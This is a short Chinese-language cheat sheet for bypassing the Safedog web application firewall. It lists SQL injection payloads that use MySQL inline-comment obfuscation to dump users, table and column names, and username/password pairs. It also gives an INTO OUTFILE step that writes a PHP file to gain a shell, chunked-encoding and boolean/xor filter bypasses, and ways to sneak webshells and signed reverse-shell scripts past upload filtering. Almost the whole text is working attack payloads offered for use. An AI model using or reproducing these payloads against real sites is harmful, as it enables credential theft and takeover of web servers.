sql绕过安全狗
get->post
借助burp
内联注释(加一些东西混淆)
看回显获取用户
url.php?id=-1'/*!50000union/*!(select*/1,2,3);
url.php?id=-1'/*!50000union/*!(select*/~1,2,3);
url.php?id=-1'/*!50000union/*!50000/*!(select*/~1,2,3)
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,user/*!50000(*/))
1' /*!44111union*/ /*!44111select*/ 1, /*!44111user*//*!44111()*/#
1' /*!44111union*/ /*!44111select*/ 1,(/*!44111select*//*!44111password*//*!44111from*//*!44111users*/limit 0,1)#
获取表名
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),table_name from information_schema.tables where table_schema=database/*!50000(*/))
获取列名
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),column_name from information_schema.columns where table_name=’users’)
获取数据
http://127.0.0.1/killdog/dog.php?id=-1/*!12322union/*!11111/*!(select*/~1,2,group_concat(username,0x7e,password)from/*!`users`*/)
Getshell
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/1,2,’<?php phpinfo();?>’ into outfile ‘dir’)
chunked编码(分割)
burp功能
其他
'&&true '&&false ' && true ' && false
'||true '||false ' || ture ' ||false
字符型的话也可以通过浮点数 1.0and 1=1 来绕过对and的检测
异或xor
上传绕过安全狗
方法1:
php/asp/aspx/jsp 通用需要借助文件包含(不管是自己构造还是系统就有)
将大马写到txt文件中,命名为dama.txt,再新建一个文本
asp的写入<!-#include file="dama.txt"->
保存,两文件放到同目录下,反问url/x.asp,然后访问即可
php的写入<?php require_once(dama.txt);?>
方法2:
有的安全狗不是识别内容,而是识别签名,可以使用工具将自己的脚本或者反弹shell的脚本加上签名,就可以绕过。
后面在继续更新。。。